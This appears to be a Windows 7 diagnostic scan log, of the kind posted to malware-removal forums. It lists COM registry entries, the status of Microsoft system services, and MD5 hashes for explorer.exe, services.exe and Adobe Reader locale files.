"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 22:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
========== Custom Scans ==========
========== Base Services ==========
SRV:64bit: - [2009/07/13 20:40:01 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:64bit: - [2013/02/27 00:47:10 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:64bit: - [2009/07/13 20:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:64bit: - [2010/11/20 22:23:51 | 000,849,920 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:64bit: - [2010/11/20 22:24:00 | 000,705,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:64bit: - [2014/04/11 21:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)
SRV:64bit: - [2009/07/13 20:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2009/07/13 20:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:64bit: - [2012/07/04 17:13:27 | 000,136,704 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:64bit: - [2014/07/06 21:06:31 | 000,187,904 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV - [2014/07/06 20:40:07 | 000,143,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)
SRV:64bit: - [2010/11/20 22:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:64bit: - [2010/11/20 22:24:00 | 000,317,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2010/11/20 22:24:09 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:64bit: - [2011/03/03 01:24:16 | 000,183,296 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:64bit: - [2009/07/13 20:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)
SRV:64bit: - [2009/07/13 20:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2009/07/13 20:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:64bit: - [2009/07/13 20:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:64bit: - [2010/11/20 22:23:48 | 000,501,248 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
SRV:64bit: - [2014/08/22 14:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2014/08/22 14:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2009/07/13 20:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:64bit: - [2009/07/13 20:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:64bit: - [2009/07/13 20:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:64bit: - [2009/07/13 20:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)
SRV - [2009/07/13 20:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)
SRV:64bit: - [2012/10/03 12:44:21 | 000,303,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:64bit: - [2009/07/13 20:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:64bit: - [2011/05/24 06:42:55 | 000,404,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:64bit: - [2012/02/11 01:36:02 | 000,559,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:64bit: - [2014/04/11 21:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)
No service found with a name of EMDMgmt
SRV:64bit: - [2009/07/13 20:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:64bit: - [2010/11/20 22:24:17 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:64bit: - [2010/11/20 22:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:64bit: - [2010/11/20 22:24:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:64bit: - [2014/04/11 21:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:64bit: - [2009/07/13 20:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:64bit: - [2010/11/20 22:23:48 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:64bit: - [2010/11/20 22:23:55 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2010/11/20 22:24:03 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:64bit: - [2010/11/20 22:24:16 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:64bit: - [2010/11/20 22:24:32 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2010/11/20 22:24:00 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:64bit: - [2009/07/13 20:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:64bit: - [2012/05/01 00:40:20 | 000,209,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:64bit: - [2010/11/20 22:23:55 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:64bit: - [2014/07/06 21:06:30 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)
SRV:64bit: - [2014/07/06 21:06:30 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)
SRV:64bit: - [2010/11/20 22:25:06 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2010/11/20 22:23:55 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)
SRV:64bit: - [2010/11/20 22:24:28 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:64bit: - [2010/11/20 22:24:48 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:64bit: - [2010/11/20 22:24:15 | 000,128,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msiexec.exe -- (msiserver)
SRV - [2010/11/20 22:24:28 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWow64\msiexec.exe -- (msiserver)
SRV:64bit: - [2009/07/13 20:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:64bit: - [2014/05/14 11:23:46 | 002,477,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:64bit: - [2010/11/20 22:24:09 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:64bit: - [2009/07/13 20:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)
SRV:64bit: - [2010/11/20 22:24:32 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)
< %SYSTEMDRIVE%\*.exe >
< MD5 for: EXPLORER.EXE >
[2011/02/26 00:19:21 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=0FB9C74046656D1579A64660AD67B746 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_ba87e574ddfe652d\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\erdnt\cache86\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_afa79dc39081d0ba\explorer.exe
[2011/02/26 01:14:34 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=3B69712041F3D63605529BD66DC00C48 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_b0333b22a99da332\explorer.exe
[2010/11/20 22:24:25 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_ba2f56d3c4bcbafb\explorer.exe
[2011/02/25 00:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\SysWOW64\explorer.exe
[2011/02/25 00:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_b9fc4815c4e292b5\explorer.exe
[2010/11/20 22:24:11 | 002,872,320 | ---- | M] (Microsoft Corporation) MD5=AC4C51EB24AA95B77F705AB159189E24 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_afdaac81905bf900\explorer.exe
< MD5 for: SERVICES >
[2009/06/10 16:00:26 | 000,017,463 | ---- | M] () MD5=D9E1A01B480D961B7CF0509D597A92D6 -- C:\Windows\winsxs\amd64_microsoft-windows-w..nfrastructure-other_31bf3856ad364e35_6.1.7600.16385_none_6079f415110c0210\services
< MD5 for: SERVICES.ASFX >
[2014/09/04 07:51:08 | 000,002,652 | ---- | M] () MD5=02401F78DDB80A1702E2594C40647FCA -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sv_SE\Services\Services.asfx
[2014/09/04 07:51:14 | 000,002,627 | ---- | M] () MD5=05039BCC8D5799E973F7C9695272209C -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nb_NO\Services\Services.asfx
[2014/09/04 07:51:16 | 000,002,695 | ---- | M] () MD5=0C2759F87571CB0856DF97281AB11F48 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\pt_BR\Services\Services.asfx
[2014/09/04 07:51:12 | 000,002,627 | ---- | M] () MD5=134BCD7B1333586959CF89072FF6A265 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\da_DK\Services\Services.asfx
[2014/09/04 07:51:18 | 000,002,600 | ---- | M] () MD5=2186D5B1BED1CFE0457765303462705B -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_CN\Services\Services.asfx
[2014/09/04 07:51:50 | 000,002,710 | ---- | M] () MD5=243F440B6401962F2388F7ACFCA6A26A -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ro_RO\Services\Services.asfx
[2014/09/04 07:51:00 | 000,002,804 | ---- | M] () MD5=2E156E44760D6B246EA9A1AA0844697A -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ja_JP\Services\Services.asfx
[2014/09/04 07:51:16 | 000,002,703 | ---- | M] () MD5=500CB404D45B74E35896C6A5633F377B -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ko_KR\Services\Services.asfx
[2014/09/04 07:51:22 | 000,002,762 | ---- | M] () MD5=56D0A5A91E854340B14F19AAA05854D0 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hu_HU\Services\Services.asfx
[2014/09/04 07:51:38 | 000,003,134 | ---- | M] () MD5=57D45EA50B060B30D434685477DA1FE8 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ru_RU\Services\Services.asfx
[2014/09/04 07:51:52 | 000,003,107 | ---- | M] () MD5=5D2F185D3F70D19553CFE95CC0DEFDC5 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\uk_UA\Services\Services.asfx
[2014/09/04 07:51:54 | 000,002,646 | ---- | M] () MD5=626040093DA208CFB7DC8DEFD5419CB5 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\eu_ES\Services\Services.asfx
[2014/09/04 07:50:56 | 000,002,728 | ---- | M] () MD5=6C3ED58AF1515EF421E8835A7AD50CE2 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\de_DE\Services\Services.asfx
[2014/09/04 07:51:48 | 000,002,650 | ---- | M] () MD5=731C236A275736CDCC26599C85521E68 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hr_HR\Services\Services.asfx
[2014/09/04 07:51:20 | 000,002,609 | ---- | M] () MD5=77960EFFB46E6720EE6E1F88040E9CBA -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_TW\Services\Services.asfx
[2014/09/04 07:51:14 | 000,002,669 | ---- | M] () MD5=8FE9D9DE93CC74750429227C5C079149 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fi_FI\Services\Services.asfx
[2014/09/04 07:51:20 | 000,002,709 | ---- | M] () MD5=9806ABE74F65D32806BA1B8339E4950A -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\cs_CZ\Services\Services.asfx
[2014/09/04 07:51:04 | 000,002,672 | ---- | M] () MD5=9906D8E2C123B66288B41D65F2FDE6E6 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\it_IT\Services\Services.asfx
[2014/09/04 07:51:52 | 000,002,734 | ---- | M] () MD5=9FFDC10E4A4EEBE40BD28E670F8EA3DA -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sk_SK\Services\Services.asfx
[2014/09/04 07:50:54 | 000,002,694 | ---- | M] () MD5=ABE9FC6BC64120ED4CDC335B386DD64D -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fr_FR\Services\Services.asfx
[2014/09/04 07:51:54 | 000,002,681 | ---- | M] () MD5=D37DD56473ACA875D42C88823743B4E5 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ca_ES\Services\Services.asfx
[2014/09/04 07:51:50 | 000,002,660 | ---- | M] () MD5=D72943B51BC6BFB8F626098073EA0F5D -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sl_SI\Services\Services.asfx
[2014/09/04 07:51:08 | 000,002,695 | ---- | M] () MD5=DB50639AE052FD450E6365B8724CE3D1 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nl_NL\Services\Services.asfx
[2010/11/16 00:02:32 | 000,000,228 | R--- | M] () MD5=E09422BE0C7636A7B63A1527C4C1372D -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx
[2014/09/04 07:51:22 | 000,002,666 | ---- | M] () MD5=E3856B5FBFD932C3A7E2F65D063D3849 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\pl_PL\Services\Services.asfx
[2014/09/04 07:51:30 | 000,002,678 | ---- | M] () MD5=EA5C0628B559E2607D9219285F5DCA27 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\tr_TR\Services\Services.asfx
[2014/09/04 07:51:06 | 000,002,683 | ---- | M] () MD5=FCD9EE2A20A156B4A4497E731D95284A -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\es_ES\Services\Services.asfx
< MD5 for: SERVICES.ASFX1 >
[2010/11/16 00:02:32 | 000,000,228 | R--- | M] () MD5=A7B7A4CC1A717292474115CD3A4AC121 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx1
< MD5 for: SERVICES.ASFX10 >
[2010/11/16 00:02:34 | 000,000,233 | R--- | M] () MD5=3382FAB54FC906B0E40269D903A8D690 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx10
< MD5 for: SERVICES.ASFX11 >
[2010/11/16 00:02:26 | 000,000,227 | R--- | M] () MD5=F36865AB3B9813962B7EDBE66FA1C28A -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx11
< MD5 for: SERVICES.ASFX12 >
[2010/11/16 00:02:30 | 000,000,225 | R--- | M] () MD5=9287C7268CC0F37F1DDE18CEBB128685 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx12
< MD5 for: SERVICES.ASFX13 >
[2010/11/16 00:02:30 | 000,000,228 | R--- | M] () MD5=95326C46AC2654AFF5C8543DFE22CCB3 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx13
< MD5 for: SERVICES.ASFX14 >
[2010/11/16 00:02:26 | 000,000,228 | R--- | M] () MD5=14DA84ECAF57B5ADA36B9093FF04CF32 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx14
< MD5 for: SERVICES.ASFX15 >
[2010/11/16 00:02:26 | 000,000,231 | R--- | M] () MD5=CF94F061685A38BABE0BBD463191EDE7 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx15
< MD5 for: SERVICES.ASFX16 >
[2010/11/16 00:02:34 | 000,000,232 | R--- | M] () MD5=B6E63D87C73CED2D6B433C542C5C3965 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx16
< MD5 for: SERVICES.ASFX17 >
[2010/11/16 00:02:34 | 000,000,230 | R--- | M] () MD5=545E97C4F4CEA743A8D86B685EE2EDBB -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx17
< MD5 for: SERVICES.ASFX18 >
[2010/11/16 00:02:24 | 000,000,230 | R--- | M] () MD5=2577B66F38E0DEA25F328DA4A0FED322 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx18
< MD5 for: SERVICES.ASFX19 >
[2010/11/16 00:02:26 | 000,000,225 | R--- | M] () MD5=0A27F1D6595A69800A43CDE155B1E4A0 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx19
< MD5 for: SERVICES.ASFX2 >
[2010/11/16 00:02:36 | 000,000,264 | R--- | M] () MD5=0652D24D4E2799851A6DF1705E2BFFDA -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx2
< MD5 for: SERVICES.ASFX20 >
[2010/11/16 00:02:38 | 000,000,231 | R--- | M] () MD5=C85F2519DC6AECF93F67AA613A320136 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx20
< MD5 for: SERVICES.ASFX21 >
[2010/11/16 00:02:26 | 000,000,231 | R--- | M] () MD5=8C95C0528EA7049A1DFC7A7342461D75 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx21
< MD5 for: SERVICES.ASFX22 >
[2010/11/16 00:02:24 | 000,000,231 | R--- | M] () MD5=9F2731666F5771CC5C1E4EEDC8FB8607 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx22
< MD5 for: SERVICES.ASFX23 >
[2010/11/16 00:02:26 | 000,000,225 | R--- | M] () MD5=0E89BE53F56B22390CF61584B649CE01 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx23
< MD5 for: SERVICES.ASFX24 >
[2010/11/16 00:02:32 | 000,000,229 | R--- | M] () MD5=E57594DB9B9D78AB4B53D34CAFEB8497 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx24
< MD5 for: SERVICES.ASFX25 >
[2010/11/16 00:02:36 | 000,000,232 | R--- | M] () MD5=611CB9CC21D2DDAD711690671F70EF39 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx25
< MD5 for: SERVICES.ASFX3 >
[2010/11/16 00:02:34 | 000,000,229 | R--- | M] () MD5=F9824728970AC8199BABDC9CBA5E038C -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx3
< MD5 for: SERVICES.ASFX4 >
[2010/11/16 00:02:26 | 000,000,226 | R--- | M] () MD5=55EA57D90AE22BDF0132597EF0D7C9C7 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx4
< MD5 for: SERVICES.ASFX5 >
[2010/11/16 00:02:34 | 000,000,233 | R--- | M] () MD5=846C265B751189E88B74F0155DB6B828 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx5
< MD5 for: SERVICES.ASFX6 >
[2010/11/16 00:02:36 | 000,000,231 | R--- | M] () MD5=89BD37C4118540FD5AA8CDD0C24D6C0A -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx6
< MD5 for: SERVICES.ASFX7 >
[2010/11/16 00:02:34 | 000,000,245 | R--- | M] () MD5=0B82FAB8FF5F988C5311DF1144A7D740 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx7
< MD5 for: SERVICES.ASFX8 >
[2010/11/16 00:02:34 | 000,000,231 | R--- | M] () MD5=5226417D3C8206000A8983BDC1243075 -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx8
< MD5 for: SERVICES.ASFX9 >
[2010/11/16 00:02:30 | 000,000,234 | R--- | M] () MD5=EBD8D036504F2935675F5F432F076DBA -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.asfx9
< MD5 for: SERVICES.CFG >
[2014/09/04 07:50:22 | 000,559,515 | ---- | M] () MD5=704FFA2F886780380DB96EF03E5FC512 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Services\Services.cfg
[2010/11/16 00:02:22 | 000,032,633 | R--- | M] () MD5=EA1C35DD541D60819D55482130BD585D -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA7FFFFB744AA0000000010\10.0.0\services.cfg
< MD5 for: SERVICES.EXE >
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\erdnt\cache64\services.exe
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\SysNative\services.exe
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.exe
< MD5 for: SERVICES.EXE.MUI >
[2011/04/12 03:17:17 | 000,017,408 | ---- | M] (Microsoft Corporation) MD5=6507BF0DC2D1F5F32493C288EAA59277 -- C:\Windows\SysNative\en-US\services.exe.mui
[2011/04/12 03:17:17 | 000,017,408 | ---- | M] (Microsoft Corporation) MD5=6507BF0DC2D1F5F32493C288EAA59277 -- C:\Windows\winsxs\amd64_microsoft-windows-s..ontroller.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c5f238be3fa63468\services.exe.mui
< MD5 for: SERVICES.LNK >
[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
< MD5 for: SERVICES.MOF >
[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\SysNative\wbem\services.mof
[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.mof
< MD5 for: SERVICES.MSC >
[2011/04/12 03:17:16 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\en-US\services.msc
[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\services.msc
